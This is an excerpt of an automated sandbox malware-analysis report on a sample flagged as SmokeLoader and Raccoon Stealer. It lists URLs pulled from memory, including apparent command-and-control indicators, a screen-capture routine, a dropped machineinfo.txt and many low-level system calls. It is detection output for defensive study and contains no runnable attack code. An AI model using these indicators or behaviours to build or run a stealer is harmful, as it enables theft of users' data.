Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.4.dr | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: nssckbi.dll.4.dr | String found in binary or memory: http://ocsp.accv.es0
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://repository.swisssign.com/0
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: http://ss.ask.com/query?q=
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000002.00000000.1293389954.00000000014B0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.accv.es00
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mozglue.dll.4.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://www.mozilla.com0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehph
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: sqlite3.dll.4.dr | String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: nssckbi.dll.4.dr | String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 3BD3.exe, 00000004.00000002.1530759275.000000004B380000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com
Source: nssckbi.dll.4.dr | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.4.dr | String found in binary or memory: https://repository.luxtrust.lu0
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search?ei=
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
Source: y2017hGX7.4.dr | String found in binary or memory: https://support.mozilla.org
Source: y2017hGX7.4.dr | String found in binary or memory: https://support.mozilla.org/en-US/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
Source: y2017hGX7.4.dr | String found in binary or memory: https://support.mozilla.org/en-US/products/firefoxgro.allizom.troppus.
Source: 3BD3.exe, 00000004.00000002.1528044132.0000000000726000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: https://telete.in/jarkadiyvolniy
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: https://tenadevmonster.top/
Source: nssckbi.dll.4.dr | String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.4.dr | String found in binary or memory: https://www.catcert.net/verarrel05
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr | String found in binary or memory: https://www.google.com/favicon.ico
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/about/gro.allizom.www.
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/contribute/gro.allizom.www.
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp, firefox_urls.txt.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/Welcome
Source: 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/vV
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/firefox/central/gro.allizom.www.
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, firefox_urls.txt.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/media/img/firefox/template/page-image-master.1b6efe3d5631.jpg
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, firefox_urls.txt.4.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: y2017hGX7.4.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match | File source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.y98WYYcJ2U.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.y98WYYcJ2U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.cwfbibg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.cwfbibg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.cwfbibg.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00425145 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,4_2_00425145
Source: 48F3.exe, 00000005.00000002.1653465876.000000000621A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_0040182B Sleep,NtTerminateProcess,0_2_0040182B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_00402440 NtClose,0_2_00402440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_0040184B Sleep,NtTerminateProcess,0_2_0040184B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_00401856 Sleep,NtTerminateProcess,0_2_00401856
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_00401837 Sleep,NtTerminateProcess,0_2_00401837
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_00401600 NtMapViewOfSection,0_2_00401600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_00401758 Sleep,NtTerminateProcess,0_2_00401758
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_004017DA NtTerminateProcess,0_2_004017DA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_004023E8 NtClose,0_2_004023E8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A360 ZwAllocateVirtualMemory,LdrInitializeThunk,0_2_7268A360
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A37A NtQueryInformationProcess,LdrInitializeThunk,0_2_7268A37A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A300 ZwOpenKey,LdrInitializeThunk,0_2_7268A300
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A6A0 ZwCreateSection,LdrInitializeThunk,0_2_7268A6A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A480 ZwMapViewOfSection,LdrInitializeThunk,0_2_7268A480
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A560 ZwQuerySystemInformation,LdrInitializeThunk,0_2_7268A560
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A520 ZwEnumerateKey,LdrInitializeThunk,0_2_7268A520
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A5C0 ZwDuplicateObject,LdrInitializeThunk,0_2_7268A5C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A260 ZwWriteFile,0_2_7268A260
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726CA27C RtlAllocateHeap,ZwQueryVirtualMemory,RtlFreeHeap,0_2_726CA27C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72645275 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268B270 ZwLockVirtualMemory,0_2_7268B270
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A240 ZwReadFile,0_2_7268A240
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726C825D ZwRaiseHardError,0_2_726C825D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72701243 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701243
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72718248 ZwAlertThreadByThreadId,0_2_72718248
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A220 ZwWaitForSingleObject,0_2_7268A220
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7267523D ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72688200 EtwpCreateEtwThread,ZwResumeThread,EtwpCreateEtwThread,ZwTerminateThread,ZwClose,0_2_72688200
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7267A20E RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,0_2_7267A20E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72648209 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,0_2_72648209
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7270221F ZwCreateSection,ZwMapViewOfSection,memset,memcpy,ZwUnmapViewOfSection,ZwClose,0_2_7270221F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72649210 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,0_2_72649210
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7264B2E0 TpSetPoolThreadBasePriority,ZwSetInformationWorkerFactory,TpSetPoolThreadBasePriority,0_2_7264B2E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7270B2E0 ZwQueryVirtualMemory,ZwProtectVirtualMemory,0_2_7270B2E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A2F0 ZwQueryInformationFile,0_2_7268A2F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7267D2FE RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,0_2_7267D2FE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726722C3 RtlRunOnceExecuteOnce,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_726722C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726892CD RtlInitUnicodeString,RtlInitUnicodeString,ZwCreateFile,ZwSetInformationFile,RtlFreeUnicodeString,0_2_726892CD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A2C0 ZwSetEvent,0_2_7268A2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726DB2C0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap,0_2_726DB2C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A2D0 ZwClose,0_2_7268A2D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_727012CA memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727012CA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726D12B9 ZwAllocateVirtualMemory,memset,RtlInitializeSid,0_2_726D12B9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726642B0 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,0_2_726642B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A2B0 ZwSetInformationThread,0_2_7268A2B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726442BE RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,0_2_726442BE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726C3284 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,0_2_726C3284
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7267328D RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,0_2_7267328D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72688284 ZwCreateThreadEx,ZwClose,0_2_72688284
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72684290 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,0_2_72684290
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7266D36F memcmp,ZwSetInformationThread,RtlDeactivateActivationContextUnsafeFast,RtlSetThreadSubProcessTag,memset,RtlRaiseException,ZwSetInformationThread,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,0_2_7266D36F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726D137B ZwRaiseException,ZwTerminateProcess,0_2_726D137B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A370 ZwQueryInformationProcess,0_2_7268A370
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_726C3371 ZwOpenKeyEx,0_2_726C3371
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72688375 ZwAllocateVirtualMemory,ZwFreeVirtualMemory,0_2_72688375
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72701351 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701351
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72718356 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72718356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268C340 RtlUnhandledExceptionFilter,ZwTerminateProcess,0_2_7268C340
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268A340 ZwQueryKey,0_2_7268A340
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_72671356 RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,0_2_72671356
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe | Code function: 0_2_7268C350 RtlUnhandledExceptionFilter,ZwTerminateProcess,0_2_7268C350
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A350 ZwQueryValueKey,0_2_7268A350
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72715331 ZwSetEvent,ZwWaitForSingleObject,0_2_72715331
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA32E ZwQueryInformationProcess,ZwMapViewOfSection,ZwClose,0_2_726CA32E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72685322 ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationObject,ZwSetInformationThread,ZwAdjustPrivilegesToken,ZwSetInformationThread,0_2_72685322
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264E328 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,0_2_7264E328
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264C330 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,0_2_7264C330
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A330 ZwQueryDefaultLocale,0_2_7268A330
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72649305 ZwClose,ZwClose,0_2_72649305
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C308 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwUnmapViewOfSection,ZwClose,0_2_7266C308
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266A314 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlInitString,___swprintf_l,RtlInitString,RtlAllocateHeap,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,0_2_7266A314
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A310 ZwEnumerateValueKey,0_2_7268A310
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264D319 memset,ZwIsUILanguageComitted,RtlpGetNameFromLangInfoNode,ZwQueryInstallUILanguage,RtlLCIDToCultureName,RtlFreeHeap,0_2_7264D319
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264F3E0 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,0_2_7264F3E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A3E0 ZwFreeVirtualMemory,0_2_7268A3E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726893F6 RtlAllocateHeap,RtlAllocateHeap,RtlCreateUnicodeString,ZwCreateEvent,ZwCreateEvent,RtlInitializeCriticalSectionEx,RtlQueryPerformanceCounter,RtlAllocateHeap,ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeHeap,0_2_726893F6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727183D7 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727183D7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A3C0 ZwSetInformationProcess,0_2_7268A3C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727013D8 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727013D8
